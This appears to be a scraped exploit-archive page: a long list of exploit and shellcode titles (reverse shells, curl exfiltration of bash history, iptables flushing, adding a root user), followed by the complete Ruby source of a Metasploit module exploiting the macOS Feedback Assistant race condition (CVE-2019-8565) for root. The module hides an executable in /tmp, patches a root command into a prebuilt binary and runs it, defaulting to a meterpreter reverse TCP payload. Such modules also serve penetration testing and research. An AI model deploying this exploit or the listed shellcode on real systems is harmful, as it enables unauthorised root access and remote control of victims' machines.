
18 changes to exploits/shellcodes macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free Apple macOS < 10.14.5 / iOS < 12.3 DFG JIT Compiler - 'HasIndexedProperty' Use-After-Free Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - Loop-Invariant Code Motion (LICM) in DFG JIT Leaves Stack Variable Uninitialized Apple macOS < 10.14.5 / iOS < 12.3 JavaScriptCore - AIR Optimization Incorrectly Removes Assignment to Register Apple macOS < 10.14.5 / iOS < 12.3 XNU - Wild-read due to bad cast in stf_ioctl Apple macOS < 10.14.5 / iOS < 12.3 XNU - 'in6_pcbdetach' Stale Pointer Use-After-Free NetAware 1.20 - 'Add Block' Denial of Service (PoC) NetAware 1.20 - 'Share Name' Denial of Service (PoC) Terminal Services Manager 3.2.1 - Denial of Service Visual Voicemail for iPhone - IMAP NAMESPACE Processing Use-After-Free Microsoft Windows 10 (17763.379) - Install DLL Microsoft Windows (x84/x64) - 'Error Reporting' Discretionary Access Control List / Local Privilege Escalation Microsoft Windows 10 1809 - 'CmKeyBodyRemapToVirtualForEnum' Arbitrary Key Enumeration Privilege Escalation Apple Mac OS X - Feedback Assistant Race Condition (Metasploit) Microsoft Windows (x84) - Task Scheduler' .job' Import Arbitrary Discretionary Access Control List Write / Local Privilege Escalation Microsoft Internet Explorer 11 - Sandbox Escape Microsoft Windows - 'Win32k' Local Privilege Escalation Axis Network Camera - .srv to parhand RCE (Metasploit) Axis Network Camera - .srv to parhand Remote Code Execution (Metasploit) HP Intelligent Management - Java Deserialization RCE (Metasploit) HP 
Intelligent Management - Java Deserialization Remote Code Execution (Metasploit) Erlang - Port Mapper Daemon Cookie RCE (Metasploit) Erlang - Port Mapper Daemon Cookie Remote Code Execution (Metasploit) CMS Made Simple (CMSMS) Showtime2 - File Upload RCE (Metasploit) CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Code Execution (Metasploit) AIS logistics ESEL-Server - Unauth SQL Injection RCE (Metasploit) Pimcore < 5.71 - Unserialize RCE (Metasploit) AIS logistics ESEL-Server - Unauthenticated SQL Injection Remote Code Execution (Metasploit) Pimcore < 5.71 - Unserialize Remote Code Execution (Metasploit) Shopware - createInstanceFromNamedArguments PHP Object Instantiation Remote Code Execution (Metasploit) Nagios XI 5.6.1 - SQL injection BSD/x86 - setuid(0) + Bind (31337/TCP) Shell Shellcode (94 bytes) BSD/x86 - setuid(0) + Bind (31337/TCP) Shell (/bin/sh) Shellcode (94 bytes) Linux/x86 - execve(/sbin/iptables -F) Shellcode (70 bytes) Linux/x86 - Flush IPTables Rules (execve(/sbin/iptables -F)) Shellcode (70 bytes) Linux/x86 - /sbin/iptables --flush Shellcode (69 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables --flush) Shellcode (69 bytes) Linux/x86 - iptables --flush Shellcode (43 bytes) Linux/x86 - Flush IPTables Rules (iptables --flush) Shellcode (43 bytes) Linux/x86 - iptables -F Shellcode (43 bytes) Linux/x86 - Flush IPTables Rules (iptables -F) Shellcode (43 bytes) Linux/x86 - Reverse TCP (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes) Linux/x86 - Reverse (::FFFF:192.168.1.5:4444/TCP) Shell (/bin/sh) + Null-Free + IPv6 Shellcode (86 bytes) Linux/x86 - Reverse TCP (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes) Linux/x86 - Reverse (fd15:4ba5:5a2b:1002:61b7:23a9:ad3d:5509:1337/TCP) Shell (/bin/sh) + IPv6 Shellcode (Generator) (94 bytes) Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes) Linux/MIPS (Big 
Endian) - execve(/bin/sh) + Reverse TCP (192.168.2.157/31337) Shellcode (181 bytes) Linux/x86 - wget chmod execute over execve /bin/sh -c Shellcode (119 bytes) Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes) macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes) macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes) macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) Apple macOS - Reverse (::1:4444/TCP) Shell (/bin/sh) +IPv6 Shellcode (119 bytes) Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (129 bytes) Apple macOS - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes) Apple macOS - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (123 bytes) Apple macOS - execve(/bin/sh) + Null-Free Shellcode (31 bytes) Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes) Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (63 bytes) Linux/x86 - Add User (sshd/root) to Passwd File Shellcode (149 bytes) Linux/x86 - Add User (sshd/root) to /etc/passwd Shellcode (149 bytes) Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes) Linux/ARM - Password-Protected Reverse TCP Shellcode (100 bytes) Linux/x86 - Rabbit Shellcode Crypter (200 bytes) Linux/x86 - Reverse Shell Shellcode (91 Bytes) + Python Wrapper Linux/x86 - Openssl Encrypt Files With aes256cbc Shellcode (185 bytes) Linux/x86 - cat (.bash_history)+ base64 Encode + curl data (http://localhost:8080) Shellcode (125 bytes) Linux/ARM - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) + Password (S59!) 
+ Null-Free Shellcode (100 bytes) Linux/x86 - Rabbit Encoder Shellcode (200 bytes) Linux/x86 - Reverse (127.0.0.1:8080/TCP) Shell (/bin/sh) + Generator Shellcode (91 Bytes) Linux/x86 - OpenSSL Encrypt (aes256cbc) Files (test.txt) Shellcode (185 bytes) Linux/x86 - shred file Shellcode (72 bytes) Linux/x86 - execve /bin/sh Shellcode (20 bytes) Linux/x86 - /sbin/iptables -F Shellcode (43 bytes) Linux x86_64 - Delete File Shellcode (28 bytes) Linux/x86 - Shred file (test.txt) Shellcode (72 bytes) Linux/x86 - execve(/bin/sh) Shellcode (20 bytes) Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (43 bytes) Linux/x86_64 - Delete File (test.txt) Shellcode (28 bytes) Linux/x64 - Execve(/bin/sh) Shellcode (23 bytes)
105 lines
No EOL
3.8 KiB
Ruby
Executable file
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Post::File
  include Msf::Post::OSX::Priv
  include Msf::Post::OSX::System
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Mac OS X Feedback Assistant Race Condition',
      'Description'    => %q{
        This module exploits a race condition vulnerability in Mac's Feedback Assistant.
        A successful attempt would result in remote code execution under the context of
        root.
      },
      'License'        => MSF_LICENSE,
      'Author'         => [
        'CodeColorist', # Discovery and exploit
        'timwr',        # Metasploit module
      ],
      'References'     => [
        ['CVE', '2019-8565'],
        ['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-ii-e5a1ffff6afe'],
        ['URL', 'https://support.apple.com/en-in/HT209600'],
        ['URL', 'https://github.com/ChiChou/sploits'],
      ],
      'SessionTypes'   => [ 'meterpreter', 'shell' ],
      'Platform'       => [ 'osx', 'python', 'unix' ],
      'DefaultTarget'  => 0,
      'DefaultOptions' => { 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },
      'Targets'        => [
        [ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64,    'Platform' => [ 'osx' ] } ],
        [ 'Python payload',                { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],
        [ 'Command payload',               { 'Arch' => ARCH_CMD,    'Platform' => [ 'unix' ] } ],
      ],
      'DisclosureDate' => 'Apr 13 2019'))
    register_advanced_options [
      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
    ]
  end

  # Write a file to the target, mark it executable and schedule it for removal
  # by FileDropper once the session is cleaned up.
  def upload_executable_file(filepath, filedata)
    print_status("Uploading file: '#{filepath}'")
    write_file(filepath, filedata)
    chmod(filepath)
    register_file_for_cleanup(filepath)
  end

  # Version gate only: the fix shipped in macOS 10.14.4 (see HT209600), so
  # anything at or above that is reported Safe.
  def check
    version = Gem::Version.new(get_system_version)
    if version >= Gem::Version.new('10.14.4')
      CheckCode::Safe
    else
      CheckCode::Appears
    end
  end

  def exploit
    if check != CheckCode::Appears
      fail_with Failure::NotVulnerable, 'Target is not vulnerable'
    end

    if is_root?
      fail_with Failure::BadConfig, 'Session already has root privileges'
    end

    unless writable? datastore['WritableDir']
      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
    end

    # Build the command that the exploit binary will run as root, depending on
    # the selected target architecture.
    case target['Arch']
    when ARCH_X64
      payload_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
      binary_payload = Msf::Util::EXE.to_osx_x64_macho(framework, payload.encoded)
      upload_executable_file(payload_file, binary_payload)
      root_cmd = payload_file
    when ARCH_PYTHON
      root_cmd = "echo \"#{payload.encoded}\" | python"
    else
      root_cmd = payload.encoded
    end

    # Background the command and NUL-terminate it for the C string placeholder.
    root_cmd = root_cmd + " & \0"
    if root_cmd.length > 1024
      fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"
    end

    # Patch the command into the prebuilt exploit binary shipped in the
    # framework's data directory, overwriting the placeholder string in place.
    exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8565", "exploit"))
    placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')
    exploit_data[placeholder_index, root_cmd.length] = root_cmd

    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"
    upload_executable_file(exploit_file, exploit_data)

    print_status("Executing exploit '#{exploit_file}'")
    result = cmd_exec(exploit_file)
    print_status("Exploit result:\n#{result}")
  end
end